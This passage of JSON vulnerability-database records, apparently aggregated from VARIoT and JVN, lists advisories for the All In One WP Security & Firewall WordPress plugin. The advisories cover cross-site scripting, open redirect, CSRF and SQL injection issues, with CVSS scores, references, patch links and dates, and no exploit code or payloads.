                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10866",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89685",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10866",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10866",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10866",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-883",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89685",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2016-10866",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.2.0 for WordPress has multiple XSS issues. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10866",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89685",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "id": "VAR-201908-1123",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T21:52:00.233000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96572"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10866"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10866"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "date": "2019-08-13T18:15:11.527000",
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "date": "2019-08-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "date": "2024-11-21T02:44:56.500000",
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-0286

    Vulnerability from variot - Updated: 2024-08-14 15:42

    The All In One WP Security & Firewall WordPress plugin before 4.4.11 does not validate, sanitise and escape the redirect_to parameter before using it to redirect the user, either via a Location header or a meta url attribute, when the Rename Login Page feature is active, which could lead to an Arbitrary Redirect as well as a Cross-Site Scripting issue. Exploitation of this issue requires the Login Page URL value to be known, which should be hard to guess, reducing the risk; a hard-to-guess URL lowers the likelihood of exploitation but does not remove the flaw, which is fixed in 4.4.11. A cross-site scripting vulnerability exists in the All In One WP Security & Firewall WordPress plugin. Information may be obtained and information may be tampered with. Both WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an application plugin. When the redirect_to parameter is defined, an attacker can exploit this vulnerability to execute JavaScript code on the client.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-0286",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.4.11"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": null
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.4.11"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "cve": "CVE-2021-25102",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 2.6,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 4.9,
                "id": "CVE-2021-25102",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.9,
                "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 2.6,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 4.9,
                "id": "VHN-383823",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:H/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.7,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.6,
                "id": "CVE-2021-25102",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.7,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-25102",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-25102",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-25102",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-1900",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-383823",
                "trust": 0.1,
                "value": "LOW"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-25102",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The All In One WP Security \u0026 Firewall WordPress plugin before 4.4.11 does not validate, sanitise and escape the redirect_to parameter before using it to redirect user, either via a Location header, or meta url attribute, when the Rename Login Page is active, which could lead to an Arbitrary Redirect as well as Cross-Site Scripting issue. Exploitation of this issue requires the Login Page URL value to be known, which should be hard to guess, reducing the risk. A cross-site scripting vulnerability exists in the All In One WP Security \u0026 Firewall WordPress plugin. Information may be obtained and information may be tampered with. Both WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an application plugin. When the redirect_to parameter is defined, an attacker can exploit this vulnerability to execute JavaScript code on the client.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-25102",
            "trust": 3.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-59805",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-383823",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "id": "VAR-202205-0286",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-08-14T15:42:25.989000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All-In-One\u00a0Security\u00a0(AIOS)\u00a0-\u00a0Security\u00a0and\u00a0Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/"
          },
          {
            "title": "WordPress plugin All In One WP Security \u0026 Firewall Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=191234"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://wpscan.com/vulnerability/9b8a00a6-622b-4309-bbbf-fe2c7fc9f8b6"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25102"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2021-25102/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "date": "2022-05-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "date": "2023-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "date": "2022-05-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "date": "2022-05-02T16:15:08.093000",
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "date": "2022-05-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "date": "2023-08-14T06:05:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "date": "2022-05-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "date": "2022-05-10T13:14:58.547000",
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall\u00a0WordPress\u00a0 Cross-site scripting vulnerability in plugins",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ],
        "trust": 0.6
      }
    }

    JVNDB-2015-000038

    Vulnerability from jvndb - Published: 2015-03-06 13:46 - Updated:2015-03-11 17:42
    Severity
    N/A (UNKNOWN) - -
    Summary
    All In One WP Security & Firewall vulnerable to cross-site request forgery
    Details
    All In One WP Security & Firewall is a WordPress plugin that provides security functionality. All In One WP Security & Firewall contains a cross-site request forgery vulnerability (CWE-352).

    {
      "@rdf:about": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000038.html",
      "dc:date": "2015-03-11T17:42+09:00",
      "dcterms:issued": "2015-03-06T13:46+09:00",
      "dcterms:modified": "2015-03-11T17:42+09:00",
      "description": "All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. All In One WP Security \u0026 Firewall contains a cross-site request forgery vulnerability (CWE-352).",
      "link": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000038.html",
      "sec:cpe": {
        "#text": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
        "@product": "All In One WP Security \u0026 Firewall",
        "@vendor": "Tips and Tricks HQ",
        "@version": "2.2"
      },
      "sec:cvss": {
        "@score": "2.6",
        "@severity": "Low",
        "@type": "Base",
        "@vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
        "@version": "2.0"
      },
      "sec:identifier": "JVNDB-2015-000038",
      "sec:references": [
        {
          "#text": "http://jvn.jp/en/jp/JVN87204433/index.html",
          "@id": "JVN#87204433",
          "@source": "JVN"
        },
        {
          "#text": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0895",
          "@id": "CVE-2015-0895",
          "@source": "CVE"
        },
        {
          "#text": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0895",
          "@id": "CVE-2015-0895",
          "@source": "NVD"
        },
        {
          "#text": "https://www.ipa.go.jp/en/security/vulnerabilities/cwe.html",
          "@id": "CWE-352",
          "@title": "Cross-Site Request Forgery(CWE-352)"
        }
      ],
      "title": "All In One WP Security \u0026 Firewall vulnerable to cross-site request forgery"
    }

    JVNDB-2015-000037

    Vulnerability from jvndb - Published: 2015-03-06 13:45 - Updated:2015-03-11 17:55
    Severity
    N/A (UNKNOWN) - -
    Summary
    All In One WP Security & Firewall vulnerable to SQL injection
    Details
    All In One WP Security & Firewall is a WordPress plugin that provides security functionality. All In One WP Security & Firewall contains a SQL injection vulnerability (CWE-89). ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

    {
      "@rdf:about": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000037.html",
      "dc:date": "2015-03-11T17:55+09:00",
      "dcterms:issued": "2015-03-06T13:45+09:00",
      "dcterms:modified": "2015-03-11T17:55+09:00",
      "description": "All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. All In One WP Security \u0026 Firewall contains a SQL injection vulnerability (CWE-89).\r\n\r\nooooooo_q reported this vulnerability to IPA.\r\nJPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.",
      "link": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000037.html",
      "sec:cpe": {
        "#text": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
        "@product": "All In One WP Security \u0026 Firewall",
        "@vendor": "Tips and Tricks HQ",
        "@version": "2.2"
      },
      "sec:cvss": {
        "@score": "5.1",
        "@severity": "Medium",
        "@type": "Base",
        "@vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
        "@version": "2.0"
      },
      "sec:identifier": "JVNDB-2015-000037",
      "sec:references": [
        {
          "#text": "http://jvn.jp/en/jp/JVN30832515/index.html",
          "@id": "JVN#30832515",
          "@source": "JVN"
        },
        {
          "#text": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0894",
          "@id": "CVE-2015-0894",
          "@source": "CVE"
        },
        {
